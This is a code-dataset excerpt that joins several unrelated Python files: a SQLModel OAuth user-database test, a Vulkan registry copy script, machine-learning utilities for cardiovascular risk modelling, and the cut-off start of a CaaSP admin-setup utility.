sqlmodel_user_db_oauth: SQLModelUserDatabase[UserDBOAuth, OAuthAccount],
oauth_account1,
oauth_account2,
):
user = UserDBOAuth(
id=safe_uuid,
email="[email protected]",
hashed_password="guinevere",
oauth_accounts=[oauth_account1, oauth_account2],
)
# Create
user_db = await sqlmodel_user_db_oauth.create(user)
assert user_db.id is not None
assert hasattr(user_db, "oauth_accounts")
assert len(user_db.oauth_accounts) == 2
# Update
user_db.oauth_accounts[0].access_token = "NEW_TOKEN"
await sqlmodel_user_db_oauth.update(user_db)
# Get by id
id_user = await sqlmodel_user_db_oauth.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.oauth_accounts[0].access_token == "NEW_TOKEN"
# Get by email
email_user = await sqlmodel_user_db_oauth.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
assert len(email_user.oauth_accounts) == 2
# Get by OAuth account
oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account(
oauth_account1.oauth_name, oauth_account1.account_id
)
assert oauth_user is not None
assert oauth_user.id == user.id
assert len(oauth_user.oauth_accounts) == 2
# Unknown OAuth account
unknown_oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account("foo", "bar")
assert unknown_oauth_user is None
| [((17, 12, 17, 61), 'uuid.UUID', 'uuid.UUID', ({(17, 22, 17, 60): '"""a9089e5d-2642-406d-a7c0-cbc641aca0ec"""'}, {}), "('a9089e5d-2642-406d-a7c0-cbc641aca0ec')", False, 'import uuid\n'), ((38, 1, 48, 1), 'pytest.fixture', 'pytest.fixture', (), '', False, 'import pytest\n'), ((57, 1, 71, 1), 'pytest.fixture', 'pytest.fixture', (), '', False, 'import pytest\n'), ((21, 13, 21, 74), 'sqlmodel.create_engine', 'create_engine', (), '', False, 'from sqlmodel import Session, SQLModel, create_engine\n'), ((22, 4, 22, 40), 'sqlmodel.SQLModel.metadata.create_all', 'SQLModel.metadata.create_all', ({(22, 33, 22, 39): 'engine'}, {}), '(engine)', False, 'from sqlmodel import Session, SQLModel, create_engine\n'), ((25, 4, 25, 38), 'sqlmodel.SQLModel.metadata.drop_all', 'SQLModel.metadata.drop_all', ({(25, 31, 25, 37): 'engine'}, {}), '(engine)', False, 'from sqlmodel import Session, SQLModel, create_engine\n'), ((29, 13, 29, 80), 'sqlalchemy.ext.asyncio.create_async_engine', 'create_async_engine', (), '', False, 'from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine\n'), ((30, 19, 30, 84), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', (), '', False, 'from sqlalchemy.orm import sessionmaker\n'), ((83, 11, 87, 5), 'tests.conftest.UserDB', 'UserDB', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n'), ((135, 11, 139, 5), 'tests.conftest.UserDB', 'UserDB', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n'), ((167, 11, 172, 5), 'tests.conftest.UserDB', 'UserDB', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n'), ((188, 11, 193, 5), 'tests.conftest.UserDBOAuth', 'UserDBOAuth', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n'), ((23, 9, 23, 24), 'sqlmodel.Session', 'Session', ({(23, 17, 23, 23): 'engine'}, {}), '(engine)', False, 'from sqlmodel import Session, SQLModel, create_engine\n'), ((126, 9, 126, 52), 'pytest.raises', 'pytest.raises', ({(126, 23, 126, 51): 'NotSetOAuthAccountTableError'}, {}), '(NotSetOAuthAccountTableError)', False, 'import pytest\n'), ((142, 9, 142, 42), 'pytest.raises', 'pytest.raises', ({(142, 23, 142, 41): 'exc.IntegrityError'}, {}), '(exc.IntegrityError)', False, 'import pytest\n'), ((153, 9, 153, 42), 'pytest.raises', 'pytest.raises', ({(153, 23, 153, 41): 'exc.IntegrityError'}, {}), '(exc.IntegrityError)', False, 'import pytest\n'), ((154, 21, 156, 9), 'tests.conftest.UserDB', 'UserDB', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n'), ((144, 12, 144, 79), 'tests.conftest.UserDB', 'UserDB', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n')] |
rtbo/vkdgen | copy_reg.py | 04a228961bb091b59dc6f741eee703cd81724ca3 | #! /usr/bin/env python3
import os
from os import path
root_dir = path.dirname(path.realpath(__file__))
local_reg_dir = path.join(root_dir, 'registry')
os.makedirs(local_reg_dir, exist_ok=True)
def copy_reg(reg_dir, files):
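    """Copy each listed registry file from `reg_dir` into the local 'registry' directory,
    raising RuntimeError if any file is missing."""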
import shutil
for f in files:
file_path = path.join(reg_dir, f)
if not path.isfile(file_path):
raise RuntimeError(file_path + ' could not be found')
shutil.copy2(file_path, path.join(local_reg_dir, path.basename(f)))
vk_files = [ 'registry/vk.xml', 'registry/reg.py', 'registry/generator.py' ]
copy_reg(path.join(root_dir, 'Vulkan-Headers'), vk_files)
| [((7, 16, 7, 47), 'os.path.join', 'path.join', ({(7, 26, 7, 34): 'root_dir', (7, 36, 7, 46): '"""registry"""'}, {}), "(root_dir, 'registry')", False, 'from os import path\n'), ((8, 0, 8, 41), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((6, 24, 6, 47), 'os.path.realpath', 'path.realpath', ({(6, 38, 6, 46): '__file__'}, {}), '(__file__)', False, 'from os import path\n'), ((19, 9, 19, 46), 'os.path.join', 'path.join', ({(19, 19, 19, 27): 'root_dir', (19, 29, 19, 45): '"""Vulkan-Headers"""'}, {}), "(root_dir, 'Vulkan-Headers')", False, 'from os import path\n'), ((13, 20, 13, 41), 'os.path.join', 'path.join', ({(13, 30, 13, 37): 'reg_dir', (13, 39, 13, 40): 'f'}, {}), '(reg_dir, f)', False, 'from os import path\n'), ((14, 15, 14, 37), 'os.path.isfile', 'path.isfile', ({(14, 27, 14, 36): 'file_path'}, {}), '(file_path)', False, 'from os import path\n'), ((16, 57, 16, 73), 'os.path.basename', 'path.basename', ({(16, 71, 16, 72): 'f'}, {}), '(f)', False, 'from os import path\n')] |
atward424/ASCVD_ML | utils.py | 39404dd5f50a527576b91e8f53f5157f76382712 | import numpy as np
import pandas as pd
import scipy.stats as st
#from medical_ML import Experiment
import matplotlib.pyplot as plt
import xgboost as xgb
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression, Lasso
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn import linear_model
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.dummy import DummyRegressor
def split_cohort(datafile, to_exclude = None, test_ind_col = None, drop = 'some'):
""" Load and clean the dataset
"""
if isinstance(datafile, str):
data = pd.read_csv(datafile)
else:
data = datafile
test_data = None
if to_exclude is not None:
for k in to_exclude.keys():
if k == 'race':
data = data[data[k].isin(to_exclude[k])]
elif k == 'agebl':
data = data[data[k] >= to_exclude[k]]
elif to_exclude[k]:
data = data[data[k] == 0]
if drop == 'some':
data = data.drop(k, axis = 1)
if drop == 'all':
if (k != 'race') & (k != 'agebl'):
data = data.drop(k, axis = 1)
# self.data = self.data[self.data['year'] <= 2010]
# self.data = self.data.drop(['year'], axis = 1)
if test_ind_col is not None:
test_data = data[data[test_ind_col] == 1]
test_data = test_data.drop(test_ind_col, axis = 1)
data = data[data[test_ind_col] == 0]
data = data.drop(test_ind_col, axis = 1)
return(data, test_data)
def calc_auc_conf_interval(AUC, N1, N2, ci = 0.95):
# from https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/PASS/Confidence_Intervals_for_the_Area_Under_an_ROC_Curve.pdf
zsc = st.norm.ppf(1 - (1-ci)/2.)
q1 = AUC / (2 - AUC)
q2 = (2 * AUC * AUC) / (1 + AUC)
numerator = AUC * (1 - AUC) + (N1 - 1) * (q1 - AUC * AUC) + (N2 - 1) * (q2 - AUC * AUC)
denom = N1 * N2
se_AUC = np.sqrt(numerator / denom)
return (se_AUC, AUC - zsc * se_AUC, AUC, AUC + zsc * se_AUC)
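# Example (illustrative): 95% CI for AUC = 0.80 with group sizes N1 = 100 and N2 = 400
# se, lower, auc, upper = calc_auc_conf_interval(0.80, 100, 400)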
def load_models_and_parameters_default():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'logreg': (LogisticRegression(),
{}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {"C":[0.001, 0.01,0.1, 1]}),
'lasso2': (LogisticRegression(penalty = 'l1',solver ='saga'),
{}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [800],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
'xgb': (xgb.XGBClassifier(),
{}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
'gbm': (GradientBoostingClassifier(),
{}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 400, 800],
# 'learning_rate': [0.03, 0.01, 0.001],
# 'max_depth': [4,5,6,8],
# 'subsample': [0.85],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def load_models_and_parameters():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
'logreg': (LogisticRegression(),
{"class_weight": [None],
"C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {}), #, "balanced"
# # "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
'lasso2': (LogisticRegression(penalty = 'l1', solver ='saga'),
{"C":[0.001, 0.01,0.1, 1]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [500, 1000],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
# 'xgb': (xgb.XGBClassifier(),
# {}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
'gbm': (GradientBoostingClassifier(),
{'n_estimators': [100, 200, 400, 800],
'learning_rate': [0.03, 0.01, 0.001],
'max_depth': [4,5,6,8],
'subsample': [0.85],
'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def calc_metrics(y_true, y_pred, return_all = False):
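    """Build a per-cutoff metrics table: sweeps every prediction threshold and reports
    sens, spec, PPV, accuracy, F1 and Youden's index from cumulative TN/FN counts."""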
res_df = pd.DataFrame({'y_true' : y_true,
'y_pred': y_pred}, columns = ['y_pred', 'y_true'])
res_df = res_df.sort_values(by = 'y_pred')
res_df['TN'] = (res_df.y_true == 0).cumsum()
res_df['FN'] = (res_df.y_true == 1).cumsum()
if return_all == False:
res_df = pd.concat([pd.DataFrame({'y_true' : -1,
'y_pred': -1,
"TN": 0,
"FN":0},
index = [-1],
columns = ['y_pred', 'y_true', 'TN', "FN"]),
res_df], axis = 0)
res_df['TP'] = (res_df.y_true == 1).sum() - res_df['FN']
res_df['FP'] = (res_df.y_true == 0).sum() - res_df['TN']
res_df['sens'] = res_df.TP / (res_df.TP + res_df.FN)
res_df['spec'] = res_df.TN / (res_df.TN + res_df.FP)
res_df['PPV'] = res_df.TP / (res_df.TP + res_df.FP)
res_df['accuracy'] = (res_df.TP + res_df.TN) / (res_df.shape[0])
res_df['f1_score'] = 2 * res_df.PPV * res_df.sens / (res_df.PPV + res_df.sens)
res_df['youdens_index'] = res_df.sens + res_df.spec - 1
# remove predictions which represent non-separable decision points (i.e., y_pred is equal)
if return_all == False:
res_df = res_df[(res_df.y_pred.duplicated('last') == False)]
return(res_df)
def set_up_plot():
# plt.grid(True, 'major', color = 'w', linewidth = 0.7)
plt.grid(True, 'major', color = '0.85', linewidth = 0.7)
plt.grid(True, 'minor', color = "0.92", linestyle = '-', linewidth = 0.7)
ax = plt.gca()
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
ax.set_axisbelow(True)
# ax.patch.set_facecolor("0.85")
def train_val(RESULT_DIR, alldata, models, label = 'Label',
cv = 5,
score_name = "AUC",
to_exclude = None,
test_ind_col = None, oversample_rate = 1,
imputer = 'iterative', add_missing_flags = True):
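    """Convenience wrapper: build a medical_ML.Experiment on `alldata`, cross-validate
    the requested models, and save/plot the results under RESULT_DIR."""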
from medical_ML import Experiment
print('\n\n' + 'STARTING EXPERIMENT FOR ' + RESULT_DIR + '\n\n')
expt = Experiment(alldata, label = label,
to_exclude = to_exclude,
test_ind_col = test_ind_col, drop = 'all',
result_dir = RESULT_DIR)
expt.predict_models_from_groups(0, models, cv=cv, score_name=score_name, mode='classification',
oversample_rate = oversample_rate,
imputer = imputer, add_missing_flags = add_missing_flags)
expt.save_and_plot_results(models,
cv = cv, test = False)
return(expt) | [((55, 10, 55, 36), 'scipy.stats.norm.ppf', 'st.norm.ppf', ({(55, 22, 55, 35): '1 - (1 - ci) / 2.0'}, {}), '(1 - (1 - ci) / 2.0)', True, 'import scipy.stats as st\n'), ((60, 13, 60, 39), 'numpy.sqrt', 'np.sqrt', ({(60, 21, 60, 38): 'numerator / denom'}, {}), '(numerator / denom)', True, 'import numpy as np\n'), ((409, 13, 410, 70), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((438, 4, 438, 60), 'matplotlib.pyplot.grid', 'plt.grid', (), '', True, 'import matplotlib.pyplot as plt\n'), ((439, 4, 439, 77), 'matplotlib.pyplot.grid', 'plt.grid', (), '', True, 'import matplotlib.pyplot as plt\n'), ((440, 9, 440, 18), 'matplotlib.pyplot.gca', 'plt.gca', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((441, 4, 441, 27), 'matplotlib.pyplot.xlim', 'plt.xlim', ({(441, 13, 441, 26): '[-0.05, 1.05]'}, {}), '([-0.05, 1.05])', True, 'import matplotlib.pyplot as plt\n'), ((442, 4, 442, 27), 'matplotlib.pyplot.ylim', 'plt.ylim', ({(442, 13, 442, 26): '[-0.05, 1.05]'}, {}), '([-0.05, 1.05])', True, 'import matplotlib.pyplot as plt\n'), ((455, 11, 458, 46), 'medical_ML.Experiment', 'Experiment', (), '', False, 'from medical_ML import Experiment\n'), ((23, 15, 23, 36), 'pandas.read_csv', 'pd.read_csv', ({(23, 27, 23, 35): 'datafile'}, {}), '(datafile)', True, 'import pandas as pd\n'), ((66, 30, 66, 46), 'sklearn.dummy.DummyRegressor', 'DummyRegressor', ({}, {}), '()', False, 'from sklearn.dummy import DummyRegressor\n'), ((68, 30, 68, 50), 'sklearn.linear_model.Lasso', 'linear_model.Lasso', ({}, {}), '()', False, 'from sklearn import linear_model\n'), ((71, 27, 71, 50), 'sklearn.ensemble.RandomForestRegressor', 'RandomForestRegressor', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\n'), ((76, 28, 76, 55), 'sklearn.ensemble.GradientBoostingRegressor', 'GradientBoostingRegressor', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\n'), ((82, 26, 82, 43), 'sklearn.dummy.DummyClassifier', 'DummyClassifier', ({}, {}), '()', False, 'from sklearn.dummy import DummyClassifier\n'), ((91, 27, 91, 47), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ({}, {}), '()', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((95, 26, 95, 33), 'sklearn.linear_model.Lasso', 'Lasso', ({}, {}), '()', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((101, 27, 101, 76), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((104, 26, 104, 85), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((107, 23, 107, 47), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ({}, {}), '()', False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((115, 24, 115, 29), 'sklearn.svm.SVC', 'SVC', ({}, {}), '()', False, 'from sklearn.svm import SVC\n'), ((118, 24, 118, 46), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ({}, {}), '()', False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((150, 24, 150, 48), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\n'), ((164, 24, 164, 43), 'xgboost.XGBClassifier', 'xgb.XGBClassifier', ({}, {}), '()', True, 'import xgboost as xgb\n'), 
((203, 25, 203, 53), 'sklearn.ensemble.GradientBoostingClassifier', 'GradientBoostingClassifier', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\n'), ((238, 30, 238, 46), 'sklearn.dummy.DummyRegressor', 'DummyRegressor', ({}, {}), '()', False, 'from sklearn.dummy import DummyRegressor\n'), ((240, 30, 240, 50), 'sklearn.linear_model.Lasso', 'linear_model.Lasso', ({}, {}), '()', False, 'from sklearn import linear_model\n'), ((243, 27, 243, 50), 'sklearn.ensemble.RandomForestRegressor', 'RandomForestRegressor', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\n'), ((248, 28, 248, 55), 'sklearn.ensemble.GradientBoostingRegressor', 'GradientBoostingRegressor', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\n'), ((254, 26, 254, 43), 'sklearn.dummy.DummyClassifier', 'DummyClassifier', ({}, {}), '()', False, 'from sklearn.dummy import DummyClassifier\n'), ((259, 26, 259, 46), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ({}, {}), '()', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((268, 26, 268, 33), 'sklearn.linear_model.Lasso', 'Lasso', ({}, {}), '()', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((272, 26, 272, 76), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((277, 26, 277, 85), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((280, 23, 280, 47), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ({}, {}), '()', False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((288, 24, 288, 29), 'sklearn.svm.SVC', 'SVC', ({}, {}), '()', False, 'from sklearn.svm import SVC\n'), ((291, 24, 291, 46), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ({}, {}), '()', False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((323, 23, 323, 47), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\n'), ((387, 24, 387, 52), 'sklearn.ensemble.GradientBoostingClassifier', 'GradientBoostingClassifier', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\n'), ((69, 36, 69, 61), 'numpy.arange', 'np.arange', ({(69, 46, 69, 49): '(0.1)', (69, 51, 69, 54): '(1.0)', (69, 56, 69, 60): '(0.01)'}, {}), '(0.1, 1.0, 0.01)', True, 'import numpy as np\n'), ((241, 36, 241, 61), 'numpy.arange', 'np.arange', ({(241, 46, 241, 49): '(0.1)', (241, 51, 241, 54): '(1.0)', (241, 56, 241, 60): '(0.01)'}, {}), '(0.1, 1.0, 0.01)', True, 'import numpy as np\n'), ((415, 28, 420, 83), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n')] |
hwoarang/caasp-container-manifests | cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py | 6df831d6b4f4218f96e552c416d86eabcfad46c0 | import json
import logging
import re
import susepubliccloudinfoclient.infoserverrequests as ifsrequest
import yaml
import sys
RELEASE_DATE = re.compile(r'^.*-v(\d{8})-*.*')
def get_caasp_release_version():
"""Return the version from os-release"""
os_release = open('/etc/os-release', 'r').readlines()
for entry in os_release:
if entry.startswith('VERSION_ID'):
version_id = entry.split('=')[-1].strip()
# We assume that os-release will always have '"' as
# version delimiters
